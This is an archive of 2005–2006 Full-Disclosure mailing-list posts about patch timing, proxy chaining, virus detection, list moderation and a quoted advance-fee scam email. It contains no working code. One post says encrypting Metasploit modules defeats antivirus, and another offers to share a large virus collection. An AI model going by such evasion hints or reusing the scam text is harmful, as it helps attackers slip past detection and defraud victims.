[EMAIL PROTECTED]> wrote on 01/05/2006 04:53:45 PM:> 2. Microsoft decided to jump through a few QA tests this time, and> release a patch.>> Why should they be releasing BETA patches?
> If they do, maybe they should release BETA patches more often, let those> who want to - use them. It can probably also shorten the testing period> considerably.> If this patch is not BETA, but things did just /happen/ to progress more
> swiftly.. than maybe we should re-visit option #1 above.>> ...>> Maybe it?s just that we are used to sluggishness. Perhaps it is time we,> as users and clients, started DEMANDING of Microsoft to push things up a
> notch.>> ...>> Put in the necessary resources, and release patches within days of first> discovery. I?m willing to live with weeks and months in comparison to> the year+ that we have seen sometimes. Naturally some problems take
> longer to fix, but you get my drift.Way to go, Gadi.  Nicely put.The opensource guys almost always have different repositories for previewand testing.  Ubuntu currently has Dapper available for download and the
repositories are available, even though it's not due for release untilApril.  Debian has multiple levels of testing platforms, depending on howinsane you happen to be.  On the consumer end, many customers will also
maintain two repositories.  One for production, the other to test whatthey're about to push out.While Microsoft doesn't open their code to the world early, they couldselectively involve key customers which are willing to have a couple of
their PC's run with a different update site.  A"test.windowsupdate.microsoft.com" if you will (or the SUS equivalent).Why should the OSS people have all the fun!?  ;)
Or rather, why should the pay-for customers get the shaft when the freestuff is doing it "More Right".Matt___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WMF Exploit

2006-01-11 Thread wac
HiInteresting. How much? :DRegardsWaldoOn 1/4/06, Todd Towles <[EMAIL PROTECTED]
> wrote:Not sure, the last non-exploit pen auction was up pretty high> -Original Message-
> From: Georgi Guninski [mailto:[EMAIL PROTECTED]]> Sent: Wednesday, January 04, 2006 3:57 PM> To: Todd Towles> Cc: 
[EMAIL PROTECTED]; Technica Forensis;> full-disclosure@lists.grok.org.uk> Subject: Re: [Full-disclosure] WMF Exploit>> just wondering, how much would this 0day cost on ebay?
>> --> where do you want bill gates to go today? On Wed, Jan 04, 2006 at 09:58:37AM -0600, Todd Towles wrote:
> > Ad wrote:> > > I don't think because here win98 doesn't recognize the> .wmf extension.> >> > Without installling a third-party image viewer, it is my> understanding
> > that pre-Windows 2000 OS are less vulnerable. But most> people do have> > third-party image viewers installed and it is possible that> these apps> > make the OS attackable.
> >> > -Todd> > ___> > Full-Disclosure - We believe in it.> > Charter: 
http://lists.grok.org.uk/full-disclosure-charter.html> > Hosted and sponsored by Secunia - http://secunia.com/>___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Good proxy chaining applications

2005-12-31 Thread wac
Hi:

You can use openssh in one of the machines, plink (command line client
that comes with putty). and freecaps ( http://www.freecaps.ru ) if you
want a complete free system. But you can instead of freecaps use
proxifier (www.proxifier.com) that works better, althoug proxifier
sometimes have to be finished forcibly with the task manager 
because sometimes it becomes somehow idle in the bacground avoiding all
the outgoing connections.

Regards
Waldo AlvarezOn 12/30/05, pagvac <[EMAIL PROTECTED]> wrote:
Happy holidays to everyone who is subscribed to the list!I'm interested in getting opinions from people that have experienceusing proxy chaining applications.Please, don't tell me to use Google. I've done so already! I *don't*
want a compiled list of proxy chaining applications but rather advisefrom people that *have* actually used them.I've been playing with SocksChain [www.ufasoft.com/socks/
] whichsupposedly allows you to choose the executable of your favoritebrowser (or any other app) and it will then "sock" it. In reality, myIP address was still showing [
http://www.whatismyip.com/] after"socking" Firefox (probably I'm not doing something right).I welcome any comments on applications that provide privacy whensurfing the web. I'm interested in applications that update a list of
proxies automatically and will connect you to each of them. I'mtalking about some sort of client like SocksChain that you can installon your desktop and will then do the job, rather than cgi proxies[
http://www.freeproxy.ru/en/free_proxy/cgi-proxy.htm] or public lists[http://www.publicproxyservers.com/page1.html]Regards,pagvac
--pagvac (Adrian Pastor)www.ikwt.com - In Knowledge We Trust___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is this a Virus?

2005-12-31 Thread wac
On 12/29/05, Shawn Cox <[EMAIL PROTECTED]> wrote:

I doubt it's a virus.  Filling up a hard-disk is counter
productive to propagation.  Though I do think it was an
option in the VCL of old.


Hi:

Well if the virus releases the space before infection, can be
productive to the propagation since it would reserve that space you
won't be able to fill with other data ;).

Generally is easy to detect a virus. Feed your computer with a couple
of fresh executables, and some will go out modified with high
probability and most times with the size increased. Warning there are
slow viruses that takes it's time to reproduce, and usually last years
before somebody even notices. However this is not very usual, generally
viruses eat whaetever you give them except some with bait detection.
Most check baits for the size, and some do more advanced thingies like
analize the file for knows routines in High level laguages or
variations in the instructions. If interested I have a lot of
literature around and a huge 5000+ virus collection build over the
years. Some are still on schedule for reversing but if anyone is
interested just gime a call it would be great to save myself some time.

Regards
Waldo Alvarez


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] a call for full-disclosure to become a moderatedlist

2005-12-17 Thread wac
Hi:

I beleive that such moderated version should be given as an alternative
when people subscribe to this list. I mean in the webpage or in the
help mail. I also don't want this one to be moderated and I feel just
fine with the messages sent but if anyone wants it filtered... Well why
not, they have their rights and who knows If some day I feel that I
need it maybe I switch. Who knows?

Regards
WaldoOn 12/16/05, James Longstreet <[EMAIL PROTECTED]> wrote:
On Dec 16, 2005, at 5:55 PM, Michael Evanchik wrote:> I second thisThere's no point discussing it, or holding it to a vote.  The purposeof this list is to be unmoderated.  The list owner has stated over
and over that that is the one point he will not concede on.Kurt Seifried, among others, runs a moderated version of this list.I can't vouch for its quality, since I'm not really interested in thelist being moderated.  If you want moderation, look elsewhere.  If
you don't want someone else moderating the list, learn about filters,or even your 'D' key.Calling for full-disclosure to be moderated is pointless and iswearing out my 'D' key.___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] McAfee VirusScan vs Metasploit Framework v2.x

2005-12-09 Thread wac
Hey guys I guess you are wasting so much time. Is very easy to just
encrypt some modules and enjoy mcafee or any other to stupidly tell you
that the computer is clean. Period, do not waste your time with McAfee
or any other, it just takes 1 second. Poor world beleiving in antivirus.

Regards
WaldoOn 12/9/05, Morning Wood <[EMAIL PROTECTED]> wrote:
// look, no top post !!!> Looks like some overzealous idiot at McAfee added "Trojan" signatures for> 202 files in the latest version of the Metasploit Framework. If you use> the Framework for your job and have a McAfee support contract, *please*
> call them and let them know that their product is incorrectly tagging a> standard security tool as a "Trojan" and that this is interfering with> your ability to conduct business.the external payloads ( such as 
vncdll.dll ), could be considered a"possible malware threat"but not the whole package. ( although i guess if kiddies can root yourserver, upload msf, launch msfweb, that would give you a remote attack
platform... right ). Further, to include these sigs on a desktop product isjust ignorant.mw___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Window's O/S

2005-12-02 Thread wac
Hi:

I guess that is the remaining of an old IE bug that opened notepad.exe
on the desktop. I remember it quite well, it is archived somewhere for
sure.On 11/24/05, jacob jango <[EMAIL PROTECTED]> wrote:
Not sure if you guys are aware of this issue windows XP...!!        create an folder on deskop and name it as "notepad".   open internet explorer > go to view > source code > this will open the contents of notepad folder!!
      
		 Yahoo! Music Unlimited - Access over 1 million songs. Try it free.

___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is this a phishing attempt?

2005-08-27 Thread wac
Hi:
 
I have3 a couples of stories to talk about this.
 
Jejej I have even interchanged mail with those guys doing that. Do the following. If they are a prince or a king or a pressident or whomever wants to give you millions. Jejej tell them to pay you the airplane ticket that you have no money at all. Jajaja is only a couple of thousands that compared to a million is nothing. If they do jeje you take a free vacations. Beleive me you will receive an excuse. The intention behind those mails is to steal your money getting your data and make someone similar to you to for instance make bank transactions etc. Beware in such case you could later become a problem that needs to be erradicated so by all means never give your personal data. When you find someone owning a fortune beleivme it worth it to do that. They ask personal information as well as pictures of you. You could even follow them with the game and give them fake pictures or fake data. I remember that once one of them said he was from my country. Jejej instead of a message in english I made the guy to translate the mail if he wanted to answer me. And he/she did and also investigated. He complainted about the language that he left tha country a long time ago. Jajajaj it was very funny to look at him/her doing mistakes. Finally he/she gave up with me. Another one also told me to scan my passport and later to send it using a fax or e-mail. Jejej I told him that I didn't have one and that I didn't have the money to get it that if he could send me that it was all right. I received an excuse and never knew about that guy again.

 
Regards
Waldo Alvarez 
On 8/24/05, winsoc <[EMAIL PROTECTED]> wrote:
Hi,has anyone else received this?I seriously cannot believe that someone would be so mundane in
thinking that people would reply to this.QUOTE :-Original Message-From: prince josey [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 24, 2005 4:11 AM
Subject: - TREAT AS URGENT -ATTN: Dear Friend,How are you doing with your family?I presume that all is well withyou.I am Prince Jocelyn, the manager of audit and accounting department (LaBanque De L'Afrique) Ouagadougou, Burkina 
Faso.I got your contact from theinternational business directory when i was searching a foreigner who willassist me in a profitable business deal that will yeild us life success.Before I wrote you,I prayed that you will be a honest and reliable person
whom i can work with to achieve this deal of our life.From my section in thebank, I discovered an abandoned sum of FOURTEEN MILLION UNITED STATESDOLLARS ($USD14M) thatbelongs to one of our customer who died along with his entire
famillies,on 25TH JULY,2000 CONCORDE PLANE CRASH[Flight AF4590 ] with thewhole passengers on board.The name od the deceased man was (MR. ANDREASSCHRANNER from Munich,Germany.You have to understand that I come across this
huge amount of fund when i was balancing an Internal Audit account of thedepartmental customers file tosubmit to the bank management for the annual audit of the year.Since the bank got information about the death of the deceased man, the bank
have been expecting his next of kin to apply and claim this fund because thebank cannot release the fund to any a person unless a foreigner apply forthe transfer of the fund as the next of kin or relation to the deceased
relating to this inheritance, but unfortunately i learnt throughinvestigations that no one has come up for the claim.This is the reason why I am making this business proposal to you so that youwill apply to the bank for them to wire this fund to your nominated account
as the next of kin or relation to the deceased customer.For us to achieve this businesss immediately,the percentage ratio forsharing the fund when the bank release the fund for you must bearranged accordingly upon your confirmation of your intent.
Thereafter I will visit your country for sharing modalities ofpercentages indicated above.So for the immediate transfer of this fund intoyour bank account as arranged, you must apply first to the bank as the only
existening next of kin to the deceased customer by indicating in theapplication the bank account information where you will request the bank towire the fund.So if you accept to help me in order to achieve this great
business,i will send to you through email or by fax an application form ofclaim which you will fill with your account information and send to the bankfor the transaction to start immediately.Please i would like you to
know the following information.(1.) This business is completely free fromrisk while your personality and reputation will be protected.(2.)You will not face any circumstances beyond our control because theapplication will bear the brief information of the deceased which the bank
may like to know.(3.) If you will follow my directives,this transactionwill be completed within a short time.(4.)You should keep this businessCONFIDENTIAL or SECRET until the completion of this deal.Please contact me through my e

Re: [Full-disclosure] Off topic. To the list Admins or anyone that can help me

2005-08-20 Thread wac
Hi ppl:

Thanks to all those that tried to help me. I just can't read that much
mail. But thanks to almost all responses (except the ironic one please
save us both some time next time)

Since most answers are like this one I'll use this as reply (sorry
folks I guess this is the most optimized way for me to answer all of
your mails ;) ) But I guess this is needs to be pointed out in order
to make the list better for every one.

On 8/20/05, Cory Stoker <[EMAIL PROTECTED]> wrote:
> Hello Waldo:
> 
> I do not have a GMail account so I do not know if this possible but I
> filter this list by using the List-Id header in email.  All messages
> try sent to the full-disclosure mailing list will have the List-Id
> header set to: "An unmoderated mailing list for the discussion of
> security issues ".  Of this I make
> sure that "" is in the header.
> This makes it easier than filtering on to:, from:, or subject.  To
> view headers for a mail, I would see if there is an option to view
> all headers in your respective email client.  Of course if it is
> webmail this could not be an option.
> 
> Hope this helps...

The gmail filters are:

From
To
Subject
Has the words
Doesn't Have

Yep stuff for the masses is simple. I bet I'm not the only one with
this simplicity problems ;(

I suggest that it would be good to make configurable on the list
server if you want  modified froms or not (so people that does not
likes that can be happy too). Would that be possible? I mean without
much trouble for the admins. I guess it would be a good feature for
the list that would help some ppl that have to deal with webmails and
similars. I guess one solution for my problems could be to use the
project at sourforge similar to yahoopops but for gmail (I don't
remeber the exact name). Maybe that solves things for my desktop but
then what if I'm not at my desktop. I receive hundreds of mails
everyday form several lists so leaving them unsorted in gmail is a no
no since that takes away your productivity. On the other side I cant
install or execute some software on every computer I land.

Thanks again to everyone
Regards
Waldo Alvarez


> 
> Thanks,
> 
> -Cory
> 
> On Aug 19, 2005, at 7:15 PM, waldo alvarez wrote:
> 
> > Hi Folks:
> >
> > I'm just landed here recently because of an e-mail in bugtrack. You
> > know curiosity can take you to strange places. And jejej this list is
> > great. Non moderation simply makes it great. Now the problem is. I
> > sort mail arriving to my mailbox by category using filters. Now the
> > only common thing that applies to all mails here is the
> > [Full-disclosure] text in the subject. Everything else is a caos. The
> > from fields sometimes don't have the fulldisclosure address. And on
> > the other side I tried to sort using that text in the subject but it
> > doesn't work at all sometimes messages land in the Fulldiclosure
> > folder I have for this list but sometimes they land straigth into my
> > inbox. And there is a total caos having so much traffic this list.
> > Could anybody that solved this before gimme a hand telling me the
> > solution for this. In any case I think this list should work in that
> > sense like the rest of the lists.
> >
> > Thanks in advance
> > Waldo Alvarez
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> 
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/